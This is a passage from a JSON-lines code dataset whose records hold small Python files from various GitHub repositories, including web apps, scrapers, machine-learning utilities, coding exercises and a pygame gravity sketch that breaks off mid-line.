allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n )\n app.add_middleware(BingMiddleware)\n\n app.include_router(api.router, prefix=settings.API_PREFIX)\n\n return app\n\n\napp = get_app()\n\n@app.on_event(\"startup\")\nasync def startup_event():\n await startup_event_handler()\n","repo_name":"UKP-SQuARE/square-core","sub_path":"datastore-api/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"3"} +{"seq_id":"18600923020","text":"\"\"\"\r\nApplication Commands:\r\n1. Title - Get the Title of the page\r\n2. Current Url - Get the current url\r\n3. Page_source - Get the page source\r\n4. get() - Open the application url\r\n\"\"\"\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.service import Service\r\n\r\nsite_url = \"http://automationpractice.com/index.php\"\r\ndriver_path = \"D:\\Development\\driver\\Chrome\\chromedriver.exe\"\r\n\r\nserv_obj = Service(driver_path)\r\n\r\nwith webdriver.Chrome(service=serv_obj) as driver: # we need to user service=serv_obj, but it's showing error\r\n driver.maximize_window() # maximize the browser window\r\n driver.get(site_url)\r\n print(f\"Page Title: {driver.title}\") # title command gets the page title\r\n print(f\"Current URL: {driver.current_url}\") # current_url command gets the url\r\n print(f\"Page Source: {driver.page_source}\") # page_source command gets the page source\r\n","repo_name":"gokuldevp/Selenium-Using-Python","sub_path":"Session 5/Appcommands.py","file_name":"Appcommands.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35596176245","text":"from textgenrnn import textgenrnn\n###初始化文本生成实例\n# textgen = textgenrnn(weights_path='textgenrnnword_weights.hdf5',vocab_path='textgenrnnword_vocab.json',name='textgenrnnword')\ntextgen = textgenrnn(weights_path='textgenrnnchar_weights.hdf5',vocab_path='textgenrnnchar_vocab.json',name='textgenrnnchar')\n##预训练模型基础上训练新文本\n# textgen.train_from_file('datasets/test.txt', num_epochs=5,word_level=False)\n# textgen.generate(5,temperature=[0.5])\n# ###训练新模型\n# textgen.reset()\n# textgen.train_from_file('datasets/hacker_news_10.txt', num_epochs=10,gen_epochs=5,train_size=0.8,dropout=0.2,new_model=True,word_level=False)\n# textgen.generate(5,temperature=[0.5])\n# ##指定开头生成��子\n# textgen.generate_samples(prefix='借钱',temperatures=[0.5])\n# textgen.generate(prefix='宣',temperature=[0.5])\n#\n# ##相似计算\n# print(textgen.similarity(text='套路贷业务员会怎么判',texts=['套路贷业务员会怎么判','怎么判断和防范“套路贷','业务员如何解决被拖欠款项'],use_pca=False))\n###生成向量\ntexts = ['套路贷业务员会怎么判',\n '怎么判断和防范“套路贷']\nword_vector = textgen.encode_text_vectors(texts, pca_dims=None)\nprint(word_vector)\nprint(word_vector.shape)","repo_name":"jinjiajia/textgenrnn-chinese","sub_path":"textgenrnn-chinese/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"3"} +{"seq_id":"13874334693","text":"from utils import *\nfrom flask import Flask\nimport pandas as pd \nfrom flask import request, jsonify\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app)\napp.config['CORS_HEADERS'] = 'Content-Type'\n\n\nn_gram_counts_list = []\nfor n in range(1, 6):\n n_model_counts = count_n_grams(train_data_processed, n)\n n_gram_counts_list.append(n_model_counts)\n\n\n@app.route(\"/suggest\" , methods =[\"POST\"])\ndef get_suggestion():\n data = request.json[\"text\"] \n\n print(data)\n\n previous_tokens = nltk.word_tokenize(data)\n tmp_suggest4 = get_suggestions(previous_tokens, n_gram_counts_list, vocabulary, k=1.0)\n \n return jsonify( tmp_suggest4)\n\nif __name__ == \"__main__\":\n\n \n app.run()\n ","repo_name":"abdouaziz/autocomplet","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"70162376403","text":"from time import perf_counter\r\n\r\nwith open('17.txt', 'r') as file:\r\n inp = file.read().strip()\r\n\r\nt1_start = perf_counter()\r\n\r\nLEN = len(inp)\r\n# coordinates of rock squares relative to bottom left\r\nD = { 0: [(0,0),(1,0),(2,0),(3,0)],\r\n 1: [(1,0),(0,1),(1,1),(2,1),(1,2)],\r\n 2: [(0,0),(1,0),(2,0),(2,1),(2,2)],\r\n 3: [(0,0),(0,1),(0,2),(0,3)],\r\n 4: [(0,0),(0,1),(1,0),(1,1)] }\r\n\r\ndef print_grid(grid):\r\n for l in reversed(grid):\r\n print(' '.join(l))\r\n print()\r\n\r\ndef add(v, u):\r\n return tuple(map(sum, zip(v, u)))\r\n\r\ndef is_valid(rock, B):\r\n for x,_ in rock:\r\n if x < 0 or x >= 7: return False\r\n for x,y in rock:\r\n if (x,y) in B or y < 0: return False\r\n return True\r\n\r\ndef move_rock(rock, v, B):\r\n moved = [add(r,v) for r in rock]\r\n return moved if is_valid(moved, B) else rock\r\n\r\ndef update_height(rock, H):\r\n for x,y in rock:\r\n if y+1 > H[x]: H[x] = y+1\r\n\r\ngrid = [['.' for _ in range(7)] for _ in range(20)]\r\n\r\ndef ground_sig(low,B):\r\n return frozenset([(x,y-low) for x,y in B if y>=low])\r\n\r\ndef solve(n):\r\n seen = {}\r\n H = [0 for _ in range(7)] # highest y for each x\r\n B = set() # blocked\r\n j, i = 0, 0\r\n added = 0\r\n while i < n:\r\n rock = D[i%len(D)]\r\n offset = 2,max(H)+3\r\n rock = move_rock(rock, offset, B)\r\n while True:\r\n # horizontal move\r\n move = (1,0) if inp[j%LEN] == '>' else (-1,0)\r\n j += 1\r\n rock = move_rock(rock, move, B)\r\n # vertical move\r\n moved = move_rock(rock, (0,-1), B)\r\n if rock != moved:\r\n rock = moved\r\n else:\r\n update_height(rock, H)\r\n break\r\n B.update(rock)\r\n top = max(H)\r\n sig = (ground_sig(min(H), B), j%LEN, i%5)\r\n if sig in seen and i >= 2022:\r\n oi, otop = seen[sig]\r\n dy = top-otop\r\n di = i - oi\r\n amt = (n-i)//di\r\n added += dy*amt\r\n i += amt*di\r\n seen[sig] = i,top\r\n i += 1\r\n return added+max(H)\r\n\r\nsol_a = solve(2022)\r\nsol_b = solve(1_000_000_000_000)\r\n\r\nt1_stop = perf_counter()\r\n\r\nprint('part a:', sol_a)\r\nprint('part b:', sol_b)\r\nprint('time:', t1_stop-t1_start)","repo_name":"kilzm/aoc","sub_path":"python22/17.py","file_name":"17.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"2088591889","text":"# Write a function to determine if a word (or phrase) is a palindrome.\n\n# A palindrome is a word, number, phrase, or other sequence of characters which reads the \n# same backward as forward, such as madam, racecar. \n\n# Qs what if single digit or character? \n# also sentences? is it ok to ignore ignore capitalization, punctuation, and word boundaries? \n\n# rephrasing: if I can reverse a list without changing its meaning.\n# reverse list. \n# then check if identical... \n# this is the brute force... O(n+n) so O(n)\n\ndef rev_list(arr):\n length = len(arr)\n arr_ret = [\"\"]*length\n for i in range(0, length):\n arr_ret[i] = arr[length- i -1]\n return arr_ret\n\ndef compare(arr, rev_arr): \n for i in range(0, len(arr)):\n if arr[i] != rev_arr[i]:\n return False\n return True\n\n### testing ...\n# two known examples\n# odd length\narr = \"madam\" \nprint(arr)\nrev_arr = rev_list(arr)\nprint(compare(arr, rev_arr))\n# odd length\narr = \"racecar\"\nprint(arr)\nrev_arr = rev_list(arr)\nprint(compare(arr, rev_arr))\n# even length \narr = \"abba\"\nprint(arr)\nrev_arr = rev_list(arr)\nprint(compare(arr, rev_arr))\n\n# double letter\narr = \"aa\"\nprint(arr)\nrev_arr = rev_list(arr)\nprint(compare(arr, rev_arr))\narr = \"ab\"\nprint(arr)\nrev_arr = rev_list(arr)\nprint(compare(arr, rev_arr))\n# single letter\narr = \"a\"\nprint(arr)\nrev_arr = rev_list(arr)\nprint(compare(arr, rev_arr))\n\n# not a palindrome\narr = \"acestar\"\nprint(arr)\nrev_arr = rev_list(arr)\nprint(compare(arr, rev_arr))\nprint(\"\")\n\n# a better algo: \n# find half\n# int(len(arr)/2)\n# compare index i == length-1-i (in 1st half vs 2nd half for half the array)\n# O(n/2) so O(n) for single words or numbers. More if sentences where spaces, punctation and caps need to be removed \n\ndef find_pdrome(arr):\n if arr == None:\n retrun -1\n # drop spaces, punctations and caps (when dealing with sentences)\n arr = drop_space(arr)\n arr = drop_punct(arr)\n arr = decap(arr)\n length = len(arr)\n for i in range(0, int(length/2)):\n if arr[i] != arr[length-1-i]:\n return False\n return True\n\ndef drop_space(arr):\n # O(n)\n arr_ret = []\n for i in arr:\n if i != \" \":\n arr_ret.append(i)\n return arr_ret\n\n# could combine with drop_space to reduce total O() \ndef drop_punct(arr):\n myset = {'.',',','?','!'}\n arr_ret = [\"\"]*len(arr)\n i = 0\n j = 0\n while i < len(arr):\n if arr[i] not in myset:\n arr_ret[j] = arr[i]\n j += 1\n i += 1\n return arr_ret[0:j]\n\ndef decap(arr):\n arr_ret = [\"\"]*len(arr)\n for i in range(0,len(arr)):\n if isinstance(arr[i], str):\n arr_ret[i] = arr[i].lower()\n else:\n arr_ret[i] = arr[i]\n return arr_ret\n\n\nprint(\"a better algo: \")\n### testing ...\n# two known examples\n# odd length\narr = \"madam\" \nprint(arr)\nprint(find_pdrome(arr))\n# odd length\narr = \"racecar\"\nprint(arr)\nprint(find_pdrome(arr))\n# even length \narr = \"abba\"\nprint(arr)\nprint(find_pdrome(arr))\n\n# double letter\narr = \"aa\"\nprint(arr)\nprint(find_pdrome(arr))\narr = \"ab\"\nprint(arr)\nprint(find_pdrome(arr))\n# single letter\narr = \"a\"\nprint(arr)\nprint(find_pdrome(arr))\n\n# not a palindrome\narr = \"acestar\"\nprint(arr)\nprint(find_pdrome(arr))\n\n# other examples\narr = \"redivider\"\nprint(arr)\nprint(find_pdrome(arr))\narr = \"deified\"\nprint(arr)\nprint(find_pdrome(arr))\narr = \"civic\"\nprint(arr)\nprint(find_pdrome(arr))\narr = \"radar\"\nprint(arr)\nprint(find_pdrome(arr))\narr = \"level\"\nprint(arr)\nprint(find_pdrome(arr))\narr = \"rotor\"\nprint(arr)\nprint(find_pdrome(arr))\narr = \"kayak\"\nprint(arr)\nprint(find_pdrome(arr))\narr = \"reviver\"\nprint(arr)\nprint(find_pdrome(arr))\n\n# sentences I found online\narr = \"Mr. Owl ate my metal worm\"\nprint(arr)\nprint(find_pdrome(arr))\narr = \"Do geese see God?\"\nprint(arr)\nprint(find_pdrome(arr))\narr = \"Was it a car or a cat I saw?\"\nprint(arr)\nprint(find_pdrome(arr))\narr = \"Was it a cat or a car I saw?\"\nprint(arr)\nprint(find_pdrome(arr))\n\n\n# Then write a second function to receive a word (or phrase) list and determine which word is the longest palindrome.\n\n\nword_list = [\"madam\", \"racecar\", \"abba\", \"aa\", \"ab\", \"a\", \"acestar\", \"redivider\", \"deified\", \"civic\", \"radar\", \"level\", \"rotor\", \"kayak\", \"reviver\", \"Was it a car or a cat I saw?\", \"Mr. Owl ate my metal worm\", \"Do geese see God?\", \"Was it a cat or a car I saw?\"]\nlen_max_pdrom = 0\nmax_pdrom = \"\"\nfor arr in word_list:\n if find_pdrome(arr) and len(arr) > len_max_pdrom:\n len_max_pdrom = len(arr)\n max_pdrom = arr\n\nprint(max_pdrom)","repo_name":"markbroich/data_science","sub_path":"coding_challenges_example_solutions/palindrome/palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":4524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20234522276","text":"from django.contrib import messages\nfrom django.shortcuts import (\n render, redirect, reverse, HttpResponse, get_object_or_404\n )\nfrom products.models import Product, Category\n\n\ndef view_basket(request):\n \"\"\"\n A view to display the basket page\n \"\"\"\n product = Product.objects.all()\n categories = Category.objects.all()\n context = {\n 'product': product,\n 'categories': categories\n }\n return render(request, 'basket/basket.html', context)\n\n\ndef add_to_basket(request, pid):\n \"\"\"\n A view to add a quantity of the specified product to the shopping basket\n \"\"\"\n product = get_object_or_404(Product, pk=pid)\n quantity = int(request.POST.get('quantity'))\n basket = request.session.get('basket', {})\n if not product:\n messages.error(request, 'Product does not exist!')\n return redirect(reverse('view_basket'))\n if pid in list(basket.keys()):\n basket[pid] += quantity\n messages.success(\n request, f'Updated {product.name} quantity to {basket[pid]}'\n )\n else:\n basket[pid] = quantity\n messages.success(\n request, f'Added {product.name} to your basket'\n )\n request.session['basket'] = basket\n\n # redirect the current page\n return redirect(request.META['HTTP_REFERER'])\n\n\ndef adjust_basket(request, pid):\n \"\"\"\n Update quantity of the specified product to the shopping basket\n \"\"\"\n product = get_object_or_404(Product, pk=pid)\n quantity = int(request.POST.get('quantity'))\n basket = request.session.get('basket', {})\n if not product:\n messages.error(\n request, 'Product does not exist'\n )\n return redirect(\n reverse('view_basket')\n )\n if quantity > 0:\n basket[pid] = quantity\n messages.success(\n request, f'Updated {product.name} quantity to {basket[pid]}'\n )\n else:\n basket.pop(pid)\n messages.success(\n request, f'Removed {product.name} from your basket'\n )\n request.session['basket'] = basket\n return redirect(reverse('view_basket'))\n\n\ndef remove_from_basket(request, pid):\n \"\"\"Remove the item from the shopping bag\"\"\"\n try:\n product = get_object_or_404(Product, pk=pid)\n basket = request.session.get('basket', {})\n basket.pop(pid)\n print(basket)\n messages.success(\n request, f'Removed {product.name} from your bag'\n )\n request.session['basket'] = basket\n return HttpResponse(status=200)\n\n except Exception as e:\n messages.error(\n request, f'Error removing item: {e}'\n )\n return HttpResponse(status=500)\n","repo_name":"mabin9527/online_bookstore","sub_path":"basket/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74823766162","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy import Request\nimport json\nimport os\nclass NpsAttractionsSpider(scrapy.Spider):\n name = 'nps_attractions'\n allowed_domains = ['tripadvisor.com']\n def __init__(self):\n self.parkname =''\n\n def start_requests(self):\n data = json.loads(open('/Users/h/national_park_scrapy/nps_tripadvisor/nps_tripadvisor/spiders/nps_urls.json').read())\n nps_dict = dict(data)\n for key, value in nps_dict.iteritems():\n self.parkname = key\n print(key)\n print(value)\n yield Request(value, callback=self.parse, meta={'Name': key})\n\n\n def parse(self, response):\n attraction_points = response.xpath('//div[@class=\"listing_info\"]')\n name=self.parkname.replace(\"_\", \" \")\n for point in attraction_points:\n title = point.xpath('div[@class=\"listing_title \"]/a/text()').extract_first()\n url = point.xpath('div[@class=\"listing_title \"]/a/@href').extract_first()\n description = point.xpath('div[@class=\"listing_rating\"]/div[@class=\"popRanking wrap\"]/text()').extract_first()\n activity_types = point.xpath('div[@class=\"tag_line\"]/div[@class=\"p13n_reasoning_v2\"]/a/span/text()').extract()\n tags = [activity_type for activity_type in activity_types]\n yield{'name':name, 'data': {'url': url, 'title': title,'description':description, 'tags':tags}}\n relative_next_url = response.xpath('//a[@class=\"nav next rndBtn ui_button primary taLnk\"]/@href').extract_first()\n part_urls = response.url.split('/Attractions')\n absolute_next_url = str(part_urls[0])+ str(relative_next_url)\n yield Request(absolute_next_url, callback=self.parse)\n","repo_name":"toanphan0303/nps_scrapy","sub_path":"nps_tripadvisor/nps_tripadvisor/spiders/nps_attractions.py","file_name":"nps_attractions.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15425445272","text":"import random\nimport tempfile\n\nfrom tensorflow.python import keras\nfrom tensorflow.python.data.ops import dataset_ops\nfrom tensorflow.python.eager import def_function\nfrom tensorflow.python.framework import constant_op\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import tensor_spec\nfrom tensorflow.python.keras.layers.preprocessing import string_lookup\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.platform import test\n\n\nclass DistributeKplTestUtils(test.TestCase):\n \"\"\"Utils for test of tf.distribute + KPL.\"\"\"\n FEATURE_VOCAB = [\n \"avenger\", \"ironman\", \"batman\", \"hulk\", \"spiderman\", \"kingkong\",\n \"wonder_woman\"\n ]\n LABEL_VOCAB = [\"yes\", \"no\"]\n\n def define_kpls_for_training(self, use_adapt):\n \"\"\"Function that defines KPL used for unit tests of tf.distribute.\n\n Args:\n use_adapt: if adapt will be called. False means there will be precomputed\n statistics.\n\n Returns:\n feature_mapper: a simple keras model with one keras StringLookup layer\n which maps feature to index.\n label_mapper: similar to feature_mapper, but maps label to index.\n\n \"\"\"\n if use_adapt:\n feature_lookup_layer = (\n string_lookup.StringLookup(\n num_oov_indices=1))\n feature_lookup_layer.adapt(self.FEATURE_VOCAB)\n label_lookup_layer = (\n string_lookup.StringLookup(\n num_oov_indices=0, mask_token=None))\n label_lookup_layer.adapt(self.LABEL_VOCAB)\n else:\n feature_lookup_layer = (\n string_lookup.StringLookup(\n vocabulary=self.FEATURE_VOCAB, num_oov_indices=1))\n label_lookup_layer = (\n string_lookup.StringLookup(\n vocabulary=self.LABEL_VOCAB, num_oov_indices=0, mask_token=None))\n\n raw_feature_input = keras.layers.Input(\n shape=(3,), dtype=dtypes.string, name=\"feature\", ragged=True)\n feature_id_input = feature_lookup_layer(raw_feature_input)\n feature_mapper = keras.Model({\"features\": raw_feature_input},\n feature_id_input)\n\n raw_label_input = keras.layers.Input(\n shape=(1,), dtype=dtypes.string, name=\"label\")\n label_id_input = label_lookup_layer(raw_label_input)\n label_mapper = keras.Model({\"label\": raw_label_input}, label_id_input)\n\n return feature_mapper, label_mapper\n\n def dataset_fn(self, feature_mapper, label_mapper):\n \"\"\"Function that generates dataset for test of tf.distribute + KPL.\n\n Args:\n feature_mapper: a simple keras model with one keras StringLookup layer\n which maps feature to index.\n label_mapper: similar to feature_mapper, but maps label to index.\n\n Returns:\n Generated dataset for test of tf.distribute + KPL.\n\n \"\"\"\n\n def feature_and_label_gen():\n # Generator of dataset.\n while True:\n features = random.sample(self.FEATURE_VOCAB, 3)\n label = [\"yes\"] if self.FEATURE_VOCAB[0] in features else [\"no\"]\n yield {\"features\": features, \"label\": label}\n\n raw_dataset = dataset_ops.Dataset.from_generator(\n feature_and_label_gen,\n output_signature={\n \"features\": tensor_spec.TensorSpec([3], dtypes.string),\n \"label\": tensor_spec.TensorSpec([1], dtypes.string)\n }).shuffle(100).batch(32)\n\n train_dataset = raw_dataset.map(lambda x: ( # pylint: disable=g-long-lambda\n {\n \"features\": feature_mapper(x[\"features\"])\n }, label_mapper(x[\"label\"])))\n return train_dataset\n\n def define_model(self):\n \"\"\"A simple model for test of tf.distribute + KPL.\"\"\"\n # Create the model. The input needs to be compatible with KPLs.\n model_input = keras.layers.Input(\n shape=(3,), dtype=dtypes.int64, name=\"model_input\")\n\n # input_dim includes a mask token and an oov token.\n emb_output = keras.layers.Embedding(\n input_dim=len(self.FEATURE_VOCAB) + 2, output_dim=20)(\n model_input)\n emb_output = math_ops.reduce_mean(emb_output, axis=1)\n dense_output = keras.layers.Dense(\n units=1, activation=\"sigmoid\")(\n emb_output)\n model = keras.Model({\"features\": model_input}, dense_output)\n return model\n\n def define_reverse_lookup_layer(self):\n \"\"\"Create string reverse lookup layer for serving.\"\"\"\n\n label_inverse_lookup_layer = string_lookup.StringLookup(\n num_oov_indices=0,\n mask_token=None,\n vocabulary=self.LABEL_VOCAB,\n invert=True)\n return label_inverse_lookup_layer\n\n def create_serving_signature(self, model, feature_mapper,\n label_inverse_lookup_layer):\n \"\"\"Create serving signature for the given model.\"\"\"\n\n @def_function.function\n def serve_fn(raw_features):\n raw_features = array_ops.expand_dims(raw_features, axis=0)\n transformed_features = model.feature_mapper(raw_features)\n outputs = model(transformed_features)\n outputs = array_ops.squeeze(outputs, axis=0)\n outputs = math_ops.cast(math_ops.greater(outputs, 0.5), dtypes.int64)\n decoded_outputs = model.label_inverse_lookup_layer(outputs)\n return array_ops.squeeze(decoded_outputs, axis=0)\n\n model.feature_mapper = feature_mapper\n model.label_inverse_lookup_layer = label_inverse_lookup_layer\n # serving does NOT have batch dimension\n return serve_fn.get_concrete_function(\n tensor_spec.TensorSpec(\n shape=(3), dtype=dtypes.string, name=\"example\"))\n\n def test_save_load_serving_model(self, model, feature_mapper,\n label_inverse_lookup_layer):\n \"\"\"Test save/load/serving model.\"\"\"\n\n serving_fn = self.create_serving_signature(model, feature_mapper,\n label_inverse_lookup_layer)\n\n saved_model_dir = tempfile.mkdtemp(dir=self.get_temp_dir())\n model.save(saved_model_dir, save_format=\"tf\",\n signatures={\"serving_default\": serving_fn})\n\n # Test the saved_model.\n loaded_serving_fn = keras.saving.save.load_model(\n saved_model_dir).signatures[\"serving_default\"]\n\n # check the result w/ and w/o avenger.\n prediction0 = loaded_serving_fn(\n constant_op.constant([\"avenger\", \"ironman\", \"avenger\"]))[\"output_0\"]\n self.assertIn(prediction0.numpy().decode(\"UTF-8\"), (\"yes\", \"no\"))\n\n prediction1 = loaded_serving_fn(\n constant_op.constant([\"ironman\", \"ironman\", \"unkonwn\"]))[\"output_0\"]\n self.assertIn(prediction1.numpy().decode(\"UTF-8\"), (\"yes\", \"no\"))\n","repo_name":"graphcore/tensorflow","sub_path":"tensorflow/python/keras/utils/kpl_test_utils.py","file_name":"kpl_test_utils.py","file_ext":"py","file_size_in_byte":6531,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"3"} +{"seq_id":"14887622811","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri May 8 16:59:06 2020\r\n\r\n@author: lx\r\n\"\"\"\r\n##导入相关算法库\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.linear_model import Lasso\r\nfrom sklearn.linear_model import Ridge\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.datasets import load_boston\r\n\r\n##载入boston房价数据集\r\nboston = load_boston() \r\n\r\n##标准化处理\r\nscaler = StandardScaler()\r\nX = scaler.fit_transform(boston[\"data\"])\r\n\r\nY = boston[\"target\"]\r\n\r\nnames = boston[\"feature_names\"]\r\n\r\n##传统线性回归模型\r\nlr = LinearRegression()\r\nlr.fit(X,Y) #fit()默认loss为RSS,算法为GD\r\n\r\n##loss中加入l1正则项的lasso\r\nlasso = Lasso(alpha=.3)\r\nlasso.fit(X, Y)\r\n\r\n##loss中加入l2正则项的岭回归\r\nridge = Ridge(alpha=.3)\r\nridge.fit(X,Y)\r\n\r\n##分别输出三种方法所得到的参数值\r\nprint(\"Linear model:\", lr.coef_)\r\nprint('Lasso model:',lasso.coef_)\r\nprint(\"Ridge model:\",ridge.coef_)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"LZW-0313/Deep-Learning","sub_path":"L_1与L_2正则化.py","file_name":"L_1与L_2正则化.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"746658567","text":"import sys\n\nlambda input: sys.stdin.readline().rstrip\n\ndef solve(n, k):\n dp[1][1] = 1\n for i in range(2, 1002):\n for j in range(1, i+1):\n if j == 1:\n dp[i][j] = 1\n elif j == i:\n dp[i][j] = 1\n else:\n dp[i][j] = dp[i-1][j-1] + dp[i-1][j]\n\n\n print(dp[n+1][k+1] % 10007)\n\n\n\nif __name__ == '__main__':\n n, k = map(int, input().split())\n\n dp = list()\n dp = [[0] * 1002 for _ in range(1003)]\n\n # dp[n][k]\n\n solve(n, k)\n\n\n\n","repo_name":"qbinee/Baekjoon","sub_path":"math/11051.py","file_name":"11051.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17507688106","text":"#deel 1\ndef standaardtarief(km):\n if km <=0:\n prijs = 0\n else:\n if km >50:\n prijs = 15 + 0.60 * (km)\n else:\n prijs = 0.80 * (km)\n return prijs\n\n#deel 2\ndef ritprijs (leeftijd, weekendrit, afstandKM):\n prijs= standaardtarief(afstandKM)\n RitPrijs= prijs\n if not weekendrit:\n if leeftijd <12 or leeftijd >=65:\n RitPrijs = prijs * 0.70\n\n if weekendrit:\n if leeftijd <12 or leeftijd >=65:\n RitPrijs= prijs * 0.65\n else:\n RitPrijs= prijs * 0.60\n return RitPrijs\n\nleeftijd= eval(input('Wat is je leeftijd?\\n'))\nweekendrit= input('Reis je in het weekend?\\n')\nif weekendrit == 'Ja':\n weekendrit = True\nelse:\n weekendrit = False\nafstandKM= eval(input('Hoever reis je?\\n'))\nprint(ritprijs(leeftijd, weekendrit, afstandKM))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Taengoo0402/test_final_assignment","sub_path":"les1/final assignment ns.py","file_name":"final assignment ns.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39276343637","text":"from django import forms\nfrom .models import Rate\nfrom account.models import MyUser\n\n\nclass PostRateForm(forms.ModelForm):\n\n class Meta:\n model = Rate\n fields = ('account',\n 'liner',\n 'pol',\n 'pod',\n 'buying20',\n 'selling20',\n 'buying40',\n 'selling40',\n 'buying4H',\n 'selling4H',\n 'loadingFT',\n 'dischargingFT',\n 'offeredDate',\n 'effectiveDate',\n 'remark',\n 'deleted',\n )\n\nclass PostSearchForm(forms.ModelForm):\n\n inputperson = forms.ModelChoiceField(queryset = MyUser.objects.all())\n\n class Meta:\n model = Rate\n fields = ('account',\n 'liner',\n 'pol',\n 'pod',\n )\n","repo_name":"mununki/RateLink-Backend","sub_path":"rate/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"7191479013","text":"import sys\nsys.path.append('/home-4/yhe23@jhu.edu/work/yuan/tools/python_lib/lib/python2.7/site-packages')\nimport pandas as pd\nimport numpy as np\nimport os\n#from matplotlib import pyplot as plt\nfrom collections import Counter\nimport pdb\n\n\ndef filterGenes(allGenes):\n ### Filter out non-functional genes\n uniqGenes = np.unique(allGenes)\n\n gene_anno = {}\n gene_annoFn = open('/work-zfs/abattle4/lab_data/annotation/gencode.v26/gencode.v26.annotation.gene.txt', 'r')\n for line in gene_annoFn.readlines():\n g = line.split('\\t')[0]\n if g in uniqGenes:\n gene_anno[g] = line.split('\\t')[6]\n\n \n allGenes_types = [gene_anno[g] for g in allGenes]\n allGenes_types = np.array(allGenes_types)\n ### allGenes_types: 69% protein coding, 9% linc RNA, 9% anti-sense, 5% processed_pseudogene, rest are other 32 gene types. \n quailfy_pairs_idx = np.where(allGenes_types == 'protein_coding')[0]\n print('After filtering for genes that dont produce protein, there are %d pairs left from %d' % (len(quailfy_pairs_idx), len(allGenes)))\n\n #plt.figure()\n #pd.DataFrame.from_dict(Counter(allGenes_types), orient='index').plot.bar()\n #plt.title('Gene types for gene in all SNP-gene pairs')\n #pd.DataFrame.from_dict(Counter(gene_anno.values()), orient='index').plot.bar()\n #plt.title('Gene types for unique gene in all SNP-gene pairs')\n #plt.show()\n #plt.savefig('%s/gene_types.pdf' % outdir)\n #plt.close()\n\n\n return quailfy_pairs_idx\n\n\n\n\n### read in all pairs\n#datadir = '/work-zfs/abattle4/heyuan/tissue_spec_eQTL_v8/datasets/cbset_datasets/cbset_per_tissue_W0.9/aggregate'\n#pairs = pd.read_csv('%s/v8_cbset_95_allPairs.txt' % datadir, sep='\\t')\n\ndatadir = '/work-zfs/abattle4/heyuan/tissue_spec_eQTL_v8/datasets/cbset_datasets/caviar_output_GTEx_LD/aggregate'\npairs = pd.read_csv('%s/v8_cbset_95_allPairs.txt' % datadir, sep='\\t')\n\ngood_idx = filterGenes(np.array(pairs['Gene']))\nfiltered_pairs = pairs.iloc[good_idx]\n\noutfn = '%s/v8_cbset_95_allPairs_filteredGenes.txt' % datadir\nfiltered_pairs.to_csv(outfn, sep='\\t', index=False)\n\nallSNPs = set(filtered_pairs['SNP'])\nsnpfn = open('/work-zfs/abattle4/heyuan/tissue_spec_eQTL_v8/datasets/GTEx_datasets/genotypes/SNPIDs.txt', 'w')\nfor snp in allSNPs:\n\tsnpfn.write('%s\\n' % snp)\n\n\n\n\n\n\n","repo_name":"heyuan7676/ts_eQTLs","sub_path":"Extended_Methods/input_dataset/filter_genes.py","file_name":"filter_genes.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"3"} +{"seq_id":"14462188552","text":"import pygame\nimport math\nimport random\nimport itertools\n\nv = \"0.0.2\"\n\n\npygame.init()\n\ndisplay = pygame.display.set_mode((1000, 800)) #w, h\nclick = pygame.time.Clock()\nFPS = 50\n\ndef calculate_acceleration(m1, m2, sep):\n if sep == 0:\n return [0, 0]\n Fg = ((6.67 * (10 ** -11)) * ((m1 * 100000) * (m2 * 100000))/((sep)**2))\n aform1 = Fg/m1\n aform2 = Fg/m2\n return [aform1, aform2]\n\ndef calculate_distance(x, y):\n xd = abs(x[0]-y[0])\n yd = abs(x[1]-y[1])\n r = math.sqrt(xd**2 + yd ** 2)\n return r\n\ndef calculate_fractions(p1, p2):\n #ac = F * AC/(BC+AC)\n ac = abs(p1[0] - p2[0])\n bc = abs(p1[1] - p2[1])\n forx = 